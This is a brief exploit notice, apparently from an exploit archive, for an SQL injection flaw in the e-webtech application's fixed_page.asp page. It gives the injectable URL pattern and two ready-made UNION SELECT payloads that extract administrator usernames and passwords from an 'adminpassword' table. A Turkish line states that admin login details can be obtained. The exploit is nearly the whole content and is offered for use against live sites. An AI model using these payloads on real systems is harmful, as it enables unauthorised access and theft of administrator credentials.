18 lines
No EOL
543 B
Text
18 lines
No EOL
543 B
Text
####################################################
|
|
e-webtech (fixed_page.asp) SQL Injection Vulnerability
|
|
####################################################
|
|
# Author : Fl0riX
|
|
#
|
|
# Name : e-webtech
|
|
#
|
|
# Bug Type : SQL Injection
|
|
#
|
|
# Infection : Admin login bilgileri alinabilir.
|
|
#
|
|
# Demo Vuln :
|
|
#
|
|
# http://[site]/fixed_page.asp?id=[SQL Inj.]
|
|
#
|
|
# User Exploit:null+union+all+select+1,username+from+adminpassword
|
|
# Password Exploit:null+union+all+select+1,pw+from+adminpassword
|
|
#################################################### |